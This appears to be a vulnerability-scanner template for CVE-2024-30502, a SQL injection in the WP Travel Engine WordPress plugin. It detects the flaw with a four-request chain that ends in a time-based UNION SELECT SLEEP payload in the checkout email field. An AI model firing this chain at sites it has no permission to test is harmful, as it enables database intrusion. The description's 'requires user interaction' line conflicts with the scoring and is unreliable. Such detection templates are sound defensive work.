id: CVE-2024-30502

info:
  name: WP Travel Engine <= 5.7.9 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  # NOTE(review): the description ends with "exploit requires user interaction",
  # but the CVSS vector below carries UI:N and the tags say "unauth" — one of the
  # two is wrong; confirm against the references before relying on either.
  description: |
    WP Travel Engine 5.7.9 and earlier contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires user interaction.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of WP Travel Engine.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel-engine/wp-travel-engine-579-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/wp-travel-engine/vulnerability/wordpress-wp-travel-engine-plugin-5-7-9-unauth-blind-sql-injection-vulnerability
    - https://plugins.trac.wordpress.org/changeset?old_path=/wp-travel-engine/tags/5.7.9&new_path=/wp-travel-engine/tags/5.8.0&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30502
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-30502
    epss-score: 0.18426
    epss-percentile: 0.95359
    cwe-id: CWE-89
  metadata:
    max-request: 4
    verified: true
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-travel-engine,unauth

# Four chained requests; each later stage only runs if the previous one matched,
# and the internal extractors below feed values into the next stage's request.
flow: http(1) && http(2) && http(3) && http(4)

http:
  # Stage 1: load a trip page and pull the trip id and the add-to-cart nonce
  # out of the HTML. Both matchers and extractors are internal, so this stage
  # never produces a finding on its own.
  - raw:
      - |
        GET /trip/ HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - 'addtocart'
          - 'tripID'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: trip_id
        part: body
        group: 1
        regex:
          - 'tripID[^\w]*([0-9]+)'
        internal: true

      - type: regex
        name: addtocart_nonce
        part: body
        group: 1
        regex:
          - 'addtocart[^\w]*([a-f0-9]{8,12})'
        internal: true

  # Stage 2: add the extracted trip to the cart through admin-ajax so that the
  # checkout page in stage 3 renders a booking form.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wte_add_trip_to_cart&_nonce={{addtocart_nonce}}&cart_version=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tripID":{{trip_id}},"packageID":{{trip_id}},"tripDate":"2026-04-01","tripTime":"","travelers":1,"cartTotal":100,"pricingOptions":{"adult":{"pax":1,"cost":100,"categoryInfo":{"label":"Adult","pricingType":"per-person"}}}}

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
        internal: true

  # Stage 3: fetch the checkout page and extract the booking-process nonce.
  - raw:
      - |
        GET /wp-travel-engine-checkout/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'booking_process_nonce'
        internal: true

    extractors:
      - type: regex
        name: booking_nonce
        part: body
        group: 1
        regex:
          - 'booking_process_nonce" value="([a-f0-9]+)"'
        internal: true

  # Stage 4: submit the booking form with the injection in the `email` field.
  # Verification is time-based: SLEEP(7) in the payload, `duration>=7` in the
  # matcher, and `@timeout: 20s` above the request line so the client waits
  # longer than the sleep. Keep these three values consistent if any is edited.
  # Defender note: the signal for WAF/log rules is a checkout POST whose email
  # parameter carries a quote followed by UNION SELECT SLEEP(.
  - raw:
      - |
        @timeout: 20s
        POST /wp-travel-engine-checkout/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wp_travel_engine_new_booking_process_action&wp_travel_engine_new_booking_process_nonce={{booking_nonce}}&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bfname%5D=T&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Blname%5D=U&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bemail%5D=x%40x.com'+UNION+SELECT+SLEEP(7)%23&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Baddress%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcity%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcountry%5D=US&wp_travel_engine_nw_bkg_submit=true&wpte_checkout_paymnet_method=booking_only

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# NOTE(review): the digest below is a signature over the template content above;
# any change to this file (including added comments) invalidates it and the
# template has to be re-signed before a signature-enforcing scanner will load it.
# digest: 4b0a00483046022100c865e2241153be0033b539535f418d2d5dd0e1b23d517ed966109ee90296bbf0022100b8c08fb7d3012350490bc5ba7b6be46d644e860476468442c6ba59ee1a39c11a:922c64590222798bb761d5b6d8e72950